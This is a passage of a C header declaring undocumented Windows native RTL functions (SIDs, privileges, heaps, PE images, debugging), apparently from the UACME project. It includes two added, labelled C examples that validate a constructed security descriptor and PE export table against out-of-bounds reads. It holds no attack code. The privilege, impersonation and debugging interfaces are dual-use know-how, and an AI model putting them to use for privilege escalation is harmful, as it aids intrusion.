_Out_ PSID Sid, _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, _In_ UCHAR SubAuthorityCount); NTSYSAPI PSID_IDENTIFIER_AUTHORITY NTAPI RtlIdentifierAuthoritySid( _In_ PSID Sid); NTSYSAPI PULONG NTAPI RtlSubAuthoritySid( _In_ PSID Sid, _In_ ULONG SubAuthority); NTSYSAPI PUCHAR NTAPI RtlSubAuthorityCountSid( _In_ PSID Sid); NTSYSAPI ULONG NTAPI RtlLengthSid( _In_ PSID Sid); NTSYSAPI NTSTATUS NTAPI RtlCopySid( _In_ ULONG DestinationSidLength, _In_ PSID DestinationSid, _In_ PSID SourceSid); NTSYSAPI NTSTATUS NTAPI RtlCopySidAndAttributesArray( _In_ ULONG ArrayLength, _In_ PSID_AND_ATTRIBUTES Source, _In_ ULONG TargetSidBufferSize, _Out_ PSID_AND_ATTRIBUTES TargetArrayElement, _Out_ PSID TargetSid, _Out_ PSID *NextTargetSid, _Out_ PULONG RemainingTargetSidBufferSize); NTSYSAPI NTSTATUS NTAPI RtlLengthSidAsUnicodeString( _In_ PSID Sid, _Out_ PULONG StringLength); NTSYSAPI NTSTATUS NTAPI RtlConvertSidToUnicodeString( _In_ PUNICODE_STRING UnicodeString, _In_ PSID Sid, _In_ BOOLEAN AllocateDestinationString); NTSYSAPI NTSTATUS NTAPI RtlCreateServiceSid( _In_ PUNICODE_STRING ServiceName, _Out_writes_bytes_opt_(*ServiceSidLength) PSID ServiceSid, _Inout_ PULONG ServiceSidLength); NTSYSAPI NTSTATUS NTAPI RtlSidEqualLevel( _In_ PSID Sid1, _In_ PSID Sid2, _Out_ PBOOLEAN EqualLevel); NTSYSAPI NTSTATUS NTAPI RtlSidIsHigherLevel( _In_ PSID Sid1, _In_ PSID Sid2, _Out_ PBOOLEAN HigherLevel); NTSYSAPI NTSTATUS NTAPI RtlReplaceSidInSd( _Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor, _In_ PSID OldSid, _In_ PSID NewSid, _Out_ ULONG* NumChanges); NTSYSAPI BOOLEAN NTAPI RtlIsElevatedRid( _In_ PSID_AND_ATTRIBUTES SidAttr); FORCEINLINE LUID NTAPI RtlConvertLongToLuid( _In_ LONG Long ) { LUID TempLuid; LARGE_INTEGER TempLi; TempLi.QuadPart = Long; TempLuid.LowPart = TempLi.LowPart; TempLuid.HighPart = TempLi.HighPart; return(TempLuid); } FORCEINLINE LUID RtlConvertUlongToLuid( _In_ ULONG Ulong ) { LUID tempLuid; tempLuid.LowPart = Ulong; tempLuid.HighPart = 0; return tempLuid; } 
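The security descriptor, ACL and SID routines declared above (RtlValidRelativeSecurityDescriptor, RtlGetDaclSecurityDescriptor, RtlGetAce, RtlValidSid, RtlConvertSidToUnicodeString) are what ntdll runs before it trusts a self-relative descriptor handed over by a less privileged party, since every offset and size inside such a descriptor is attacker-controlled data. The block below is an added example, not code from UACME or from Microsoft's headers: a portable C re-implementation of those bounds checks over a hand-constructed descriptor, so the failure mode (an AceSize or SID offset that points past the buffer) can be exercised without Windows. Constant names and layouts follow winnt.h; sample_sd, ace_info and the function names are the example's own.

```c
/* Added example (not UACME's or Microsoft's code): a bounds-checked reader for a
 * self-relative SECURITY_DESCRIPTOR that re-implements, in portable C, the checks
 * RtlValidRelativeSecurityDescriptor, RtlGetDaclSecurityDescriptor and
 * RtlConvertSidToUnicodeString perform. Layouts follow winnt.h; sample_sd is constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SE_DACL_PRESENT         0x0004
#define SE_SELF_RELATIVE        0x8000
#define ACCESS_ALLOWED_ACE_TYPE 0
#define ACCESS_DENIED_ACE_TYPE  1
#define SID_MAX_SUB_AUTHORITIES 15

typedef struct { uint8_t type; uint32_t mask; char sid[192]; } ace_info;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }

/* RtlValidSid-style check for the SID at buf[off] within buf[len]: its byte length, or 0. */
static size_t sid_length(const uint8_t *buf, size_t len, size_t off) {
    if (off > len || len - off < 8) return 0;
    uint8_t subs = buf[off + 1];
    if (buf[off] != 1 || subs > SID_MAX_SUB_AUTHORITIES) return 0;  /* SID_REVISION is 1 */
    size_t size = 8 + 4u * subs;
    return len - off < size ? 0 : size;
}

/* "S-1-<authority>-<subauth>..." like RtlConvertSidToUnicodeString (ntdll switches to hex for
 * authorities >= 2^32; this helper stays decimal). Returns the length, or -1 if out is too small. */
static int sid_to_string(const uint8_t *sid, char *out, size_t outsz) {
    uint64_t authority = 0;                               /* 48-bit, big-endian */
    for (int i = 0; i < 6; i++) authority = authority << 8 | sid[2 + i];
    int n = snprintf(out, outsz, "S-%u-%llu", (unsigned)sid[0], (unsigned long long)authority);
    if (n < 0 || (size_t)n >= outsz) return -1;
    for (uint8_t i = 0; i < sid[1]; i++) {
        int m = snprintf(out + n, outsz - n, "-%u", (unsigned)rd32(sid + 8 + 4 * i));
        if (m < 0 || (size_t)m >= outsz - n) return -1;
        n += m;
    }
    return n;
}

/* Walks the DACL without trusting any offset or size stored in the descriptor. Returns the
 * number of allow/deny ACEs (the first max_out copied to out), 0 for a NULL DACL (everyone
 * gets full access), or -1 if anything points outside the buffer. */
static int parse_dacl(const uint8_t *sd, size_t len, ace_info *out, int max_out) {
    if (len < 20 || sd[0] != 1) return -1;                /* SECURITY_DESCRIPTOR_REVISION */
    uint16_t control = rd16(sd + 2);
    if (!(control & SE_SELF_RELATIVE)) return -1;
    uint32_t owner = rd32(sd + 4), group = rd32(sd + 8), dacl = rd32(sd + 16);
    if (owner && !sid_length(sd, len, owner)) return -1;
    if (group && !sid_length(sd, len, group)) return -1;
    if (!(control & SE_DACL_PRESENT) || dacl == 0) return 0;
    if (dacl > len || len - dacl < 8) return -1;           /* ACL header */
    uint16_t acl_size = rd16(sd + dacl + 2), ace_count = rd16(sd + dacl + 4);
    if (sd[dacl] < 2 || sd[dacl] > 4 || acl_size < 8 || len - dacl < acl_size) return -1;
    size_t pos = dacl + 8, end = dacl + acl_size;
    int n = 0;
    for (uint16_t i = 0; i < ace_count; i++) {
        if (end - pos < 4) return -1;                     /* ACE_HEADER */
        uint8_t type = sd[pos];
        uint16_t ace_size = rd16(sd + pos + 2);
        if (ace_size < 4 || end - pos < ace_size) return -1;
        if (type == ACCESS_ALLOWED_ACE_TYPE || type == ACCESS_DENIED_ACE_TYPE) {
            if (ace_size < 8 || !sid_length(sd, pos + ace_size, pos + 8)) return -1;
            if (n < max_out) {
                out[n].type = type;
                out[n].mask = rd32(sd + pos + 4);
                if (sid_to_string(sd + pos + 8, out[n].sid, sizeof out[n].sid) < 0) return -1;
            }
            n++;
        }
        pos += ace_size;                                  /* other ACE types: skipped by size */
    }
    return n;
}

/* Constructed sample: owner S-1-5-32-544, group S-1-5-18, DACL = Administrators:FILE_ALL_ACCESS,
 * Everyone:FILE_GENERIC_READ. 100 bytes, all offsets relative to the descriptor start. */
static const uint8_t sample_sd[] = {
    0x01,0x00,0x04,0x80, 0x14,0,0,0, 0x24,0,0,0, 0,0,0,0, 0x30,0,0,0,   /* header: rev, control, offsets */
    0x01,0x02,0,0,0,0,0,0x05, 0x20,0,0,0, 0x20,0x02,0,0,                  /* owner SID */
    0x01,0x01,0,0,0,0,0,0x05, 0x12,0,0,0,                                 /* group SID */
    0x02,0x00,0x34,0x00, 0x02,0x00,0x00,0x00,                             /* ACL: rev 2, 52 bytes, 2 ACEs */
    0x00,0x00,0x18,0x00, 0xff,0x01,0x1f,0x00,                             /* ACE: allow, 24 bytes, 0x001F01FF */
    0x01,0x02,0,0,0,0,0,0x05, 0x20,0,0,0, 0x20,0x02,0,0,
    0x00,0x00,0x14,0x00, 0x89,0x00,0x12,0x00,                             /* ACE: allow, 20 bytes, 0x00120089 */
    0x01,0x01,0,0,0,0,0,0x01, 0,0,0,0,
};

static ace_info parsed[4];
static int parse_sample(void) { return parse_dacl(sample_sd, sizeof sample_sd, parsed, 4); }
/* Tampered copy: AceSize of the second ACE set to 0xFFFF, which must be rejected, not followed. */
static int parse_sample_bad_ace_size(void) {
    uint8_t bad[sizeof sample_sd];
    memcpy(bad, sample_sd, sizeof bad);
    bad[82] = bad[83] = 0xff;
    return parse_dacl(bad, sizeof bad, parsed, 4);
}
```

The two rejection paths are the ones that matter in practice: a descriptor cut short (RtlValidRelativeSecurityDescriptor gets the real buffer length, never the length claimed inside the descriptor) and an ACE whose AceSize reaches past its ACL. Note that a missing or NULL DACL is valid and means unrestricted access, so callers must treat the return value 0 as "no protection", not as "nothing to do".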
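The RTL Image API declared further down in this header (RtlImageNtHeaderEx with RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK, RtlImageDirectoryEntryToData, RtlImageRvaToVa, RtlFindExportedRoutineByName) walks PE headers that may have come from an untrusted file, and the NO_RANGE_CHECK flag exists precisely because the range-checked path is the safe default. As an added example (not UACME's or Microsoft's code), the block below performs the same export-by-name lookup over an unmapped PE32+ image in portable C, checking every header, section and table offset against the buffer length. The image is constructed in memory by build_sample_pe(); field offsets follow winnt.h, and the function names are the example's own.

```c
/* Added example (not UACME's or Microsoft's code): export lookup over an unmapped PE32+
 * file that re-implements, with range checks, what RtlImageNtHeaderEx (without
 * RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK), RtlImageDirectoryEntryToData(MappedAsImage=FALSE),
 * RtlImageRvaToVa and RtlFindExportedRoutineByName do. Field offsets follow winnt.h; the
 * image is built in memory by build_sample_pe(), so nothing here touches a real binary. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define SAMPLE_PE_SIZE 0x300

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> 8 * i); }

/* Offset of IMAGE_NT_HEADERS, or 0 if the DOS/NT headers or the section table do not fit in len. */
static size_t pe_nt_headers(const uint8_t *img, size_t len) {
    if (len < 0x40 || rd16(img) != 0x5A4D) return 0;                      /* IMAGE_DOS_SIGNATURE */
    uint32_t nt = rd32(img + 0x3C);                                        /* e_lfanew */
    if (nt >= len || len - nt < 24 || rd32(img + nt) != 0x4550) return 0; /* IMAGE_NT_SIGNATURE */
    size_t opt_size = rd16(img + nt + 20), nsec = rd16(img + nt + 6);
    if (len - nt - 24 < opt_size || (len - nt - 24 - opt_size) / 40 < nsec) return 0;
    return nt;
}

/* RVA -> file offset via the section table (RtlImageRvaToVa for an unmapped file); -1 if unmapped. */
static long pe_rva_to_offset(const uint8_t *img, size_t len, size_t nt, uint32_t rva) {
    size_t nsec = rd16(img + nt + 6), sec = nt + 24 + rd16(img + nt + 20);
    for (size_t i = 0; i < nsec; i++, sec += 40) {
        uint32_t va = rd32(img + sec + 12), raw_size = rd32(img + sec + 16), raw = rd32(img + sec + 20);
        if (rva < va || rva - va >= raw_size) continue;
        uint64_t off = (uint64_t)raw + (rva - va);
        return off < len ? (long)off : -1;
    }
    return -1;
}

/* RVA of the named export, or 0 if absent or the export data is malformed (forwarders not resolved). */
static uint32_t pe_find_export(const uint8_t *img, size_t len, const char *name) {
    size_t nt = pe_nt_headers(img, len), opt = nt + 24;
    if (!nt || rd16(img + nt + 20) < 120 || rd16(img + opt) != 0x20B) return 0;  /* PE32+ only */
    if (rd32(img + opt + 108) < 1 || rd32(img + opt + 116) < 40) return 0;   /* NumberOfRvaAndSizes, dir size */
    long dir = pe_rva_to_offset(img, len, nt, rd32(img + opt + 112));       /* DataDirectory[EXPORT] */
    if (dir < 0 || len - (size_t)dir < 40) return 0;
    uint32_t nfunc = rd32(img + dir + 20), nnames = rd32(img + dir + 24);
    long funcs = pe_rva_to_offset(img, len, nt, rd32(img + dir + 28));
    long names = pe_rva_to_offset(img, len, nt, rd32(img + dir + 32));
    long ords  = pe_rva_to_offset(img, len, nt, rd32(img + dir + 36));
    if (funcs < 0 || names < 0 || ords < 0) return 0;
    if ((len - (size_t)funcs) / 4 < nfunc || (len - (size_t)names) / 4 < nnames || (len - (size_t)ords) / 2 < nnames) return 0;
    for (uint32_t i = 0; i < nnames; i++) {
        long s = pe_rva_to_offset(img, len, nt, rd32(img + names + 4 * i));
        if (s < 0 || !memchr(img + s, 0, len - (size_t)s)) return 0;     /* name must end inside the image */
        if (strcmp((const char *)img + s, name) != 0) continue;
        uint16_t ord = rd16(img + ords + 2 * i);                           /* index into AddressOfFunctions */
        return ord < nfunc ? rd32(img + funcs + 4 * ord) : 0;
    }
    return 0;
}

/* Constructed PE32+: one ".edata" section at RVA 0x1000 / file offset 0x200 exporting
 * NtClose (RVA 0x2000) and NtOpenFile (RVA 0x2010). Returns the image size. */
static size_t build_sample_pe(uint8_t *buf) {
    memset(buf, 0, SAMPLE_PE_SIZE);
    wr16(buf, 0x5A4D); wr32(buf + 0x3C, 0x40);
    uint8_t *nt = buf + 0x40, *opt = nt + 24, *sec = opt + 240, *ed = buf + 0x200;
    wr32(nt, 0x4550); wr16(nt + 4, 0x8664); wr16(nt + 6, 1); wr16(nt + 20, 240);
    wr16(opt, 0x20B); wr32(opt + 108, 16);
    wr32(opt + 112, 0x1000); wr32(opt + 116, 0x60);                       /* export directory RVA/size */
    memcpy(sec, ".edata", 6);
    wr32(sec + 8, 0x100); wr32(sec + 12, 0x1000); wr32(sec + 16, 0x100); wr32(sec + 20, 0x200);
    wr32(ed + 16, 1); wr32(ed + 20, 2); wr32(ed + 24, 2);                 /* Base, NumberOfFunctions, NumberOfNames */
    wr32(ed + 28, 0x1028); wr32(ed + 32, 0x1030); wr32(ed + 36, 0x1038);  /* function/name/ordinal tables */
    wr32(ed + 0x28, 0x2000); wr32(ed + 0x2C, 0x2010);
    wr32(ed + 0x30, 0x1040); wr32(ed + 0x34, 0x1050);
    wr16(ed + 0x38, 0); wr16(ed + 0x3A, 1);
    memcpy(ed + 0x40, "NtClose", 8); memcpy(ed + 0x50, "NtOpenFile", 11);
    return SAMPLE_PE_SIZE;
}

static uint8_t sample_pe[SAMPLE_PE_SIZE];
/* Looks a name up in the sample image; len lets callers simulate a truncated read. */
static uint32_t lookup_sample(const char *name, size_t len) {
    build_sample_pe(sample_pe);
    return pe_find_export(sample_pe, len, name);
}
```

Every table the export directory points at (functions, names, ordinals, and each name string) is translated through the section table and checked against the real buffer length before it is read; a file that is shorter than its headers claim, or whose directory RVA lands in no section, yields 0 rather than an out-of-bounds read. The lookup is linear for clarity, whereas ntdll's loader binary-searches the name table and therefore also depends on it being sorted.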
NTSYSAPI ULONG NTAPI RtlUniform( _Inout_ PULONG Seed); NTSYSAPI ULONG NTAPI RtlRandomEx( _Inout_ PULONG Seed); NTSYSAPI ULONG32 NTAPI RtlComputeCrc32( _In_ ULONG32 PartialCrc, _In_ PVOID Buffer, _In_ ULONG Length); NTSYSAPI NTSTATUS NTAPI RtlAdjustPrivilege( _In_ ULONG Privilege, _In_ BOOLEAN Enable, _In_ BOOLEAN Client, _Out_ PBOOLEAN WasEnabled); #define RTL_ACQUIRE_PRIVILEGE_REVERT 0x00000001 #define RTL_ACQUIRE_PRIVILEGE_PROCESS 0x00000002 NTSYSAPI NTSTATUS NTAPI RtlAcquirePrivilege( _In_ PULONG Privilege, _In_ ULONG NumPriv, _In_ ULONG Flags, _Out_ PVOID* ReturnedState); NTSYSAPI VOID NTAPI RtlReleasePrivilege( _In_ PVOID StatePointer); NTSYSAPI NTSTATUS NTAPI RtlRemovePrivileges( _In_ HANDLE TokenHandle, _In_ PULONG PrivilegesToKeep, _In_ ULONG PrivilegeCount); NTSYSAPI BOOLEAN NTAPI RtlAreAllAccessesGranted( _In_ ACCESS_MASK GrantedAccess, _In_ ACCESS_MASK DesiredAccess); NTSYSAPI BOOLEAN NTAPI RtlAreAnyAccessesGranted( _In_ ACCESS_MASK GrantedAccess, _In_ ACCESS_MASK DesiredAccess); NTSYSAPI VOID NTAPI RtlMapGenericMask( _In_ PACCESS_MASK AccessMask, _In_ PGENERIC_MAPPING GenericMapping); NTSYSAPI NTSTATUS NTAPI RtlImpersonateSelf( _In_ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel); NTSYSAPI NTSTATUS NTAPI RtlImpersonateSelfEx( _In_ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, _In_opt_ ACCESS_MASK AdditionalAccess, _Out_opt_ PHANDLE ThreadToken); /************************************************************************************ * * RTL Version API. * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI RtlGetVersion( _Inout_ PRTL_OSVERSIONINFOW lpVersionInformation); NTSYSAPI VOID NTAPI RtlGetNtVersionNumbers( _Out_opt_ PULONG MajorVersion, _Out_opt_ PULONG MinorVersion, _Out_opt_ PULONG BuildNumber); /************************************************************************************ * * RTL Error Status API. 
* ************************************************************************************/ _When_(Status < 0, _Out_range_(> , 0)) _When_(Status >= 0, _Out_range_(== , 0)) NTSYSAPI ULONG NTAPI RtlNtStatusToDosError( _In_ NTSTATUS Status); NTSYSAPI VOID NTAPI RtlSetLastWin32Error( _In_ LONG Win32Error); NTSYSAPI NTSTATUS NTAPI RtlGetLastNtStatus( VOID); NTSYSAPI LONG NTAPI RtlGetLastWin32Error( VOID); _When_(Status < 0, _Out_range_(> , 0)) _When_(Status >= 0, _Out_range_(== , 0)) NTSYSAPI ULONG NTAPI RtlNtStatusToDosErrorNoTeb( _In_ NTSTATUS Status); NTSYSAPI VOID NTAPI RtlSetLastWin32ErrorAndNtStatusFromNtStatus( _In_ NTSTATUS Status); /************************************************************************************ * * RTL WOW64 Support API. * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI RtlWow64EnableFsRedirection( _In_ BOOLEAN Wow64FsEnableRedirection); NTSYSAPI NTSTATUS NTAPI RtlWow64EnableFsRedirectionEx( _In_ PVOID DisableFsRedirection, _Out_ PVOID *OldFsRedirectionLevel); NTSYSAPI NTSTATUS NTAPI RtlWow64GetThreadContext( _In_ HANDLE ThreadHandle, _Inout_ PWOW64_CONTEXT ThreadContext); NTSYSAPI NTSTATUS NTAPI RtlWow64SetThreadContext( _In_ HANDLE ThreadHandle, _In_ PWOW64_CONTEXT ThreadContext); /************************************************************************************ * * RTL Heap Management API. 
* ************************************************************************************/ typedef NTSTATUS(NTAPI * PRTL_HEAP_COMMIT_ROUTINE)( _In_ PVOID Base, _Inout_ PVOID *CommitAddress, _Inout_ PSIZE_T CommitSize ); typedef struct _RTL_HEAP_PARAMETERS { ULONG Length; SIZE_T SegmentReserve; SIZE_T SegmentCommit; SIZE_T DeCommitFreeBlockThreshold; SIZE_T DeCommitTotalFreeThreshold; SIZE_T MaximumAllocationSize; SIZE_T VirtualMemoryThreshold; SIZE_T InitialCommit; SIZE_T InitialReserve; PRTL_HEAP_COMMIT_ROUTINE CommitRoutine; SIZE_T Reserved[2]; } RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS; _Must_inspect_result_ NTSYSAPI PVOID NTAPI RtlCreateHeap( _In_ ULONG Flags, _In_opt_ PVOID HeapBase, _In_ SIZE_T ReserveSize, _In_ SIZE_T CommitSize, _In_opt_ PVOID Lock, _In_opt_ PRTL_HEAP_PARAMETERS Parameters); NTSYSAPI PVOID NTAPI RtlDestroyHeap( _In_ PVOID HeapHandle); NTSYSAPI NTSTATUS NTAPI RtlSetHeapInformation( _In_opt_ PVOID HeapHandle, _In_ HEAP_INFORMATION_CLASS HeapInformationClass, _In_opt_ PVOID HeapInformation, _In_ SIZE_T HeapInformationLength); NTSYSAPI NTSTATUS NTAPI RtlQueryHeapInformation( _In_ PVOID HeapHandle, _In_ HEAP_INFORMATION_CLASS HeapInformationClass, _Out_opt_ PVOID HeapInformation, _In_opt_ SIZE_T HeapInformationLength, _Out_opt_ PSIZE_T ReturnLength); _Must_inspect_result_ NTSYSAPI PVOID NTAPI RtlAllocateHeap( _In_ PVOID HeapHandle, _In_ ULONG Flags, _In_ SIZE_T Size); NTSYSAPI BOOLEAN NTAPI RtlFreeHeap( _In_ PVOID HeapHandle, _In_ ULONG Flags, _Frees_ptr_opt_ _Post_invalid_ PVOID BaseAddress); NTSYSAPI NTSTATUS NTAPI RtlZeroHeap( _In_ PVOID HeapHandle, _In_ ULONG Flags); NTSYSAPI SIZE_T NTAPI RtlSizeHeap( _In_ PVOID HeapHandle, _In_ ULONG Flags, _In_ PVOID BaseAddress); NTSYSAPI VOID NTAPI RtlProtectHeap( _In_ PVOID HeapHandle, _In_ BOOLEAN MakeReadOnly); NTSYSAPI PVOID NTAPI RtlReAllocateHeap( _In_ PVOID HeapHandle, _In_ ULONG Flags, _Frees_ptr_opt_ PVOID BaseAddress, _In_ SIZE_T Size); NTSYSAPI ULONG NTAPI RtlGetProcessHeaps( _In_ ULONG 
NumberOfHeaps, _Out_ PVOID *ProcessHeaps); typedef NTSTATUS(NTAPI *PRTL_ENUM_HEAPS_ROUTINE)( _In_ PVOID HeapHandle, _In_ PVOID Parameter ); NTSYSAPI NTSTATUS NTAPI RtlEnumProcessHeaps( _In_ PRTL_ENUM_HEAPS_ROUTINE EnumRoutine, _In_ PVOID Parameter); /************************************************************************************ * * RTL Compression API. * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI RtlGetCompressionWorkSpaceSize( _In_ USHORT CompressionFormatAndEngine, _Out_ PULONG CompressBufferWorkSpaceSize, _Out_ PULONG CompressFragmentWorkSpaceSize); NTSYSAPI NTSTATUS NTAPI RtlCompressBuffer( _In_ USHORT CompressionFormatAndEngine, _In_reads_bytes_(UncompressedBufferSize) PUCHAR UncompressedBuffer, _In_ ULONG UncompressedBufferSize, _Out_writes_bytes_to_(CompressedBufferSize, *FinalCompressedSize) PUCHAR CompressedBuffer, _In_ ULONG CompressedBufferSize, _In_ ULONG UncompressedChunkSize, _Out_ PULONG FinalCompressedSize, _In_ PVOID WorkSpace); NTSYSAPI NTSTATUS NTAPI RtlDecompressBuffer( _In_ USHORT CompressionFormat, _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer, _In_ ULONG UncompressedBufferSize, _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer, _In_ ULONG CompressedBufferSize, _Out_ PULONG FinalUncompressedSize); NTSYSAPI NTSTATUS NTAPI RtlDecompressBufferEx( _In_ USHORT CompressionFormat, _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer, _In_ ULONG UncompressedBufferSize, _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer, _In_ ULONG CompressedBufferSize, _Out_ PULONG FinalUncompressedSize, _In_ PVOID WorkSpace); /************************************************************************************ * * RTL Image API. 
* ************************************************************************************/ #define RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK (0x00000001) NTSYSAPI PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader( _In_ PVOID Base); NTSYSAPI NTSTATUS NTAPI RtlImageNtHeaderEx( _In_ ULONG Flags, _In_ PVOID Base, _In_ ULONG64 Size, _Out_ PIMAGE_NT_HEADERS * OutHeaders); NTSYSAPI PVOID NTAPI RtlAddressInSectionTable( _In_ PIMAGE_NT_HEADERS NtHeaders, _In_ PVOID BaseOfImage, _In_ ULONG VirtualAddress); NTSYSAPI PIMAGE_SECTION_HEADER NTAPI RtlSectionTableFromVirtualAddress( _In_ PIMAGE_NT_HEADERS NtHeaders, _In_ PVOID BaseOfImage, _In_ ULONG VirtualAddress); NTSYSAPI PVOID NTAPI RtlImageDirectoryEntryToData( _In_ PVOID BaseOfImage, _In_ BOOLEAN MappedAsImage, _In_ USHORT DirectoryEntry, _Out_ PULONG Size); NTSYSAPI PIMAGE_SECTION_HEADER NTAPI RtlImageRvaToSection( _In_ PIMAGE_NT_HEADERS NtHeaders, _In_ PVOID Base, _In_ ULONG Rva); NTSYSAPI PVOID NTAPI RtlImageRvaToVa( _In_ PIMAGE_NT_HEADERS NtHeaders, _In_ PVOID Base, _In_ ULONG Rva, _Inout_opt_ PIMAGE_SECTION_HEADER *LastRvaSection); NTSYSAPI PVOID NTAPI RtlFindExportedRoutineByName( _In_ PVOID BaseOfImage, _In_ PSTR RoutineName); NTSYSAPI NTSTATUS NTAPI RtlGuardCheckLongJumpTarget( _In_ PVOID PcValue, _In_ BOOL IsFastFail, _Out_ PBOOL IsLongJumpTarget); /************************************************************************************ * * RTL Time API. 
* ************************************************************************************/ NTSYSAPI VOID NTAPI RtlSecondsSince1970ToTime( _In_ ULONG ElapsedSeconds, _Out_ PLARGE_INTEGER Time); NTSYSAPI BOOLEAN NTAPI RtlTimeToSecondsSince1970( _In_ PLARGE_INTEGER Time, _Out_ PULONG ElapsedSeconds); NTSYSAPI VOID NTAPI RtlSecondsSince1980ToTime( _In_ ULONG ElapsedSeconds, _Out_ PLARGE_INTEGER Time); NTSYSAPI BOOLEAN NTAPI RtlTimeToSecondsSince1980( _In_ PLARGE_INTEGER Time, _Out_ PULONG ElapsedSeconds); NTSYSAPI VOID NTAPI RtlTimeToTimeFields( _In_ PLARGE_INTEGER Time, _Out_ PTIME_FIELDS TimeFields); NTSYSAPI BOOLEAN NTAPI RtlTimeFieldsToTime( _In_ PTIME_FIELDS TimeFields, _Out_ PLARGE_INTEGER Time); NTSYSAPI NTSTATUS NTAPI RtlSystemTimeToLocalTime( _In_ PLARGE_INTEGER SystemTime, _Out_ PLARGE_INTEGER LocalTime); NTSYSAPI NTSTATUS NTAPI RtlLocalTimeToSystemTime( _In_ PLARGE_INTEGER LocalTime, _Out_ PLARGE_INTEGER SystemTime); NTSYSAPI ULONGLONG NTAPI RtlGetSystemTimePrecise( VOID); NTSYSAPI LARGE_INTEGER NTAPI RtlGetInterruptTimePrecise( _Out_ PLARGE_INTEGER PerformanceCounter); NTSYSAPI BOOLEAN NTAPI RtlQueryUnbiasedInterruptTime( _Out_ PLARGE_INTEGER InterruptTime); NTSYSAPI KSYSTEM_TIME NTAPI RtlGetSystemTimeAndBias( _Out_ KSYSTEM_TIME TimeZoneBias, _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveStart, _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveEnd); /************************************************************************************ * * RTL Debug Support API. 
* ************************************************************************************/ NTSYSAPI ULONG STDAPIVCALLTYPE DbgPrint( _In_z_ _Printf_format_string_ PCCH Format, ...); NTSYSAPI ULONG STDAPIVCALLTYPE DbgPrintEx( _In_ ULONG ComponentId, _In_ ULONG Level, _In_z_ _Printf_format_string_ PCCH Format, ...); NTSYSAPI NTSTATUS NTAPI DbgQueryDebugFilterState( _In_ ULONG ComponentId, _In_ ULONG Level); NTSYSAPI NTSTATUS NTAPI DbgSetDebugFilterState( _In_ ULONG ComponentId, _In_ ULONG Level, _In_ BOOLEAN State); NTSYSAPI VOID NTAPI DbgUserBreakPoint( VOID); NTSYSAPI VOID NTAPI DbgBreakPoint( VOID); NTSYSAPI NTSTATUS NTAPI DbgUiConnectToDbg( VOID); NTSYSAPI VOID NTAPI DbgUiSetThreadDebugObject( _In_ HANDLE DebugObject); NTSYSAPI NTSTATUS NTAPI DbgUiContinue( _In_ PCLIENT_ID AppClientId, _In_ NTSTATUS ContinueStatus); NTSYSAPI NTSTATUS NTAPI DbgUiStopDebugging( _In_ HANDLE Process); NTSYSAPI NTSTATUS NTAPI DbgUiDebugActiveProcess( _In_ HANDLE Process); NTSYSAPI _Success_(return != 0) USHORT NTAPI RtlCaptureStackBackTrace( _In_ ULONG FramesToSkip, _In_ ULONG FramesToCapture, _Out_writes_to_(FramesToCapture, return) PVOID* BackTrace, _Out_opt_ PULONG BackTraceHash); /************************************************************************************ * * RTL AVL Tree API. * ************************************************************************************/ typedef enum _TABLE_SEARCH_RESULT { TableEmptyTree, TableFoundNode, TableInsertAsLeft, TableInsertAsRight } TABLE_SEARCH_RESULT; typedef enum _RTL_GENERIC_COMPARE_RESULTS { GenericLessThan, GenericGreaterThan, GenericEqual } RTL_GENERIC_COMPARE_RESULTS; // // Add an empty typedef so that functions can reference the // a pointer to the generic table struct before it is declared. 
// #if defined (__cplusplus) struct _RTL_AVL_TABLE; #else typedef struct _RTL_AVL_TABLE RTL_AVL_TABLE; typedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE; #endif typedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)( _In_ struct _RTL_AVL_TABLE *Table, _In_ PVOID FirstStruct, _In_ PVOID SecondStruct ); typedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)( _In_ struct _RTL_AVL_TABLE *Table, _In_ ULONG ByteSize ); typedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)( _In_ struct _RTL_AVL_TABLE *Table, _In_ _Post_invalid_ PVOID Buffer ); typedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)( _In_ struct _RTL_AVL_TABLE *Table, _In_ PVOID UserData, _In_ PVOID MatchData ); typedef struct _RTL_BALANCED_LINKS { struct _RTL_BALANCED_LINKS *Parent; struct _RTL_BALANCED_LINKS *LeftChild; struct _RTL_BALANCED_LINKS *RightChild; CHAR Balance; UCHAR Reserved[3]; } RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS; typedef struct _RTL_AVL_TABLE { RTL_BALANCED_LINKS BalancedRoot; PVOID OrderedPointer; ULONG WhichOrderedElement; 